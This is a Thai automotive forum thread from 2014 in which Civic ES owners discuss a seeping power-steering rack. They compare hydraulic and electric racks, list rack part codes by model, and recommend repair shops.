ขอบคุณทุกคอมเม้นค่ะ  กำลังจะไปหาแร็กมือสองค่ะ เพราะตอนนี้น้ำมันซึมแถวห้องเครื่องแล้วนะค่ะ
ถ้าเพื่อนมีร้านแนะนำ จัดมานะค่ะ เอาแถวบางใหญ่-บางบัวทอง ฝีมือดี ราคาไม่แพง ไม่หลอก เพราะเคยเจอโดนหลอกค่ะเห็นผู้ ญ
 
ได้รับคำขอบคุณจาก: Kittichai Solitary 
wisarutj


ชื่อเล่น: รุต

เข้าร่วม: 21 กรกฎา 2010
ตอบ: 798

Guru ES
Guru ES

ได้รับคำขอบคุณ: 482
ให้คำขอบคุณ: 9

ที่อยู่: Rayong
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 17 กันยา 2014 18:06 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ความรู้สึกนะครับ
 ใครชอบขับแบบเร็วๆ โยกซ้าย แทงขวา อาจจะรับไม่ได้กับความรู้สึกหลังเปลี่ยนเป็น แร็คไฟฟ้า นะครับ
 เหมือนเคยมีแฟน เปรี้ยวๆ แล้วเปลี่ยนมาเป็นแนวคุณหนูๆ แรกๆผมอยากเอาออกเลย ใช้ไปสักพักก็ชิน
มือที่เคยโหนต้านโค้งมันๆ มันหายไป เลยไม่ค่อยหมั้นใจ เท่าไหร่
 ข้อดีก็ไม่มีเรื่องจุกจิก ดี อาจไม่กินแรงเครื่อง
ได้รับคำขอบคุณจาก: Doraeman 
pannatad


ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
พุธ, 17 กันยา 2014 18:17 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
มีใครอยากได้แรคน้ำมัน dc5 มะ ไม่รั่ว ไม่ซึม ยกลงเพราะเปลี่ยนเครื่อง ก็เลยใส่แรคไฟฟ้าแทน ขี้เกียจหาปั๊ม ใส่ได้ประมาณครึ่งปี
ichamp.mixer


ชื่อเล่น: แชมป์

เข้าร่วม: 27 พฤษภาคม 2014
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 8
ให้คำขอบคุณ: 0

ที่อยู่: กรุงเก่า
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 24 กันยา 2014 14:04 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
เก็บข้อมูล แร็คกำลงแย่อยุ่พอดี
 
Mundo


ชื่อเล่น: ธี

เข้าร่วม: 02 พฤษภาคม 2012
ตอบ: 881

Guru ES
Guru ES

ได้รับคำขอบคุณ: 720
ให้คำขอบคุณ: 490

ที่อยู่: สุพรรณบุรี - นนทบุรี - รังสิต
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 24 กันยา 2014 15:36 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
sornsawan พิมพ์ว่า:
ขอบคุณทุกคอมเม้นค่ะ  กำลังจะไปหาแร็กมือสองค่ะ เพราะตอนนี้น้ำมันซึมแถวห้องเครื่องแล้วนะค่ะ
ถ้าเพื่อนมีร้านแนะนำ จัดมานะค่ะ เอาแถวบางใหญ่-บางบัวทอง ฝีมือดี ราคาไม่แพง ไม่หลอก เพราะเคยเจอโดนหลอกค่ะเห็นผู้ ญ



 


http://www.civicesgroup.com/forum/topic26428 ลองดูครับ 
chichimori


เข้าร่วม: 17 กันยา 2010
ตอบ: 194

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 107
ให้คำขอบคุณ: 117

ที่อยู่: รามอินทรา กม8
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 24 กันยา 2014 17:53 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
อ้างอิงจาก:
 จันทร์, 15 กันยา 2014 21:53 :: อยากสอบถามเรื่องแร็กพวงมาลัยค่ะ [ตอบโดยอ้างข้อความ]    [แจ้งผู้ดูแลระบบให้ตรวจสอบข้อความนี้]
แล็คไฟฟ้า S5A S6A S5T(ep3) เป็นแร็คไฟฟ้าตรงรุ่น ไดเมนชั่นญี่ปุ่นและ 2.0 บ้านเรา ไม่มีการดัดแปลงรถใดๆทั้งสิ้น ประกับเดิมติดรถใช้ได้เลย ฟิลลิ่งของพวงมาลัยขึ้นอยู่กับน้ำหนักโช้คกี่กดลงพื้น กันโคลง ขนาดของหน้ายาง เช่น 
   ถ้าใส่แร็ค s6m แต่ใส่ยาง 195/60/15 ใส่โช้คเดิม ไม่มีกันโคลงหรือกันโคลงเล็ก แร็คน้ำมันของ dc5 ที่คิดว่าหนืดที่สุด แต่ถ้าองค์ประกอบเป็นแบบข้างต้นมันก็เบามืออยู่ดี 
   กลับกันแร็คไฟฟ้าที่เราคิดว่าเบา แต่ใส่โช้คประมาณ FLEX MONOFLEX หรือหน้ายางกว้าง ยังไงพวงก็ตึงมืออยู่ดี 
   แล็คไฟฟ้าทำงานตามสปีดเซ็นเซอร์เพื่อให้สอดคล้องกับการใช้งานทั่วไป คือขับช้าแล้วเบา ขับเร็วขึ้นก็หนืดเพิ่มขึ้นนั่นเอง 
         *น้ำมันหรือไฟฟ้าดีกว่ากัน 
ในส่วนตัวผมว่าให้เลือกที่ชอบ 
         ไฟฟ้าหนืดตามความเร็ว แต่ถ้าโช้คแข็งก็หนืดทุกจังหวะเช่นกันแต่ก็แปลผันตามความเร็วอยู่ 
          น้ำมันหนืดทุกจังหวะ 
          *จากการเปลี่ยนแร็คไดเมนชั่นมาเป็นหลักร้อยเส้น เหตุผลที่ลูกค้าตัดสินใจคือ 
*คนที่เลือกน้ำมันเพราะมองว่า หนืดให้ทุกจังหวะ ถึงเสียจุดไหนก็ค่อยดูแลเป็นจุดๆได้ ไม่ได้หนักไปเลยทีเดียว ส่วนแกน สายแรงดันสายโลว์ สายไฮ ตัวปั่น กระปุก สายไหลกลับ เส้นสั้น เส้นยาว ก็ค่อยๆซ่อมไปทีละจุดเอา 
*คนที่เลือกแร็คไฟฟ้าเพราะมองว่า ในระยะยาวการดูแลรักษาง่ายกว่า เพราะจุดหลักมันจะมีแค่ แกนมอเตอร์กับกล่องควบคุม ที่เหลือพวกจารบีหรือบูชเลขแปดก็ราคาหลักร้อยบาท 
           ผมขายทุกแบบนะครับ ขอไม่ชี้นำในการเลือก แต่ขอลงข้อมูลที่เป็นจริง จากประสบการณ์ในการทำงานแนวนี้ในทุกวัน 
แร็คไฟฟ้าแต่ทำรถซิ่งทำให้พวงเบาและไวไปรึเปล่า ถามลุงเกิ้ลฝาแดง พี่น็อตเคยีบสี่ ตาเบ้โมโน เสี่ยต้นเฟล็กเขียว ดูได้เลยนะครับ พวงไม่เบาเหมือนใส่ 195/60/15 โช้คเดิมแน่นอน

ไฟฟ้าของสตรีมไม่มีคร้าบพี่ต้นคร้าบ สตรีมจะใช้แร็คน้ำมันพาร์ท s7c อย่างเดียวทั้งญี่ปุ่นและบ้านเราคร้าบผม 
s5a มากับไดเมนชั่น 01-02 
s6a มากับไดเมนชั่น 03-04 
s5t มากับ ep3 
scc มากับแจ๊ส 
ส่วนแร็คน้ำมันบ้านเรา 
s5a คือ 01-02 
s5h คือ 03-05 
แร็คน้ำมันยุ่น 
s7a คือ สตรีมเครื่อง 1.7 ซึ่งเหมือนกับ 1.7 ไดเมนชั่นทุกอย่าง 

อ้างอิงจาก:
s7c สตรีมเครื่อง 2.0 ถ้าจะนำมาใส่ไดเมนชั่นต้องรู้วิธีการสแว๊พเพราะแกนแร็คจะสั้นกว่า   

สุดยอดแล้วตาคนนี้ ไม่หลอกเอาเงินสาวแน่ๆจ้า  เอิ๊กๆๆ        เก๊ารอไมแคนนาดาอยู่น้าแดงฟ้าได้หมดจ้า
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.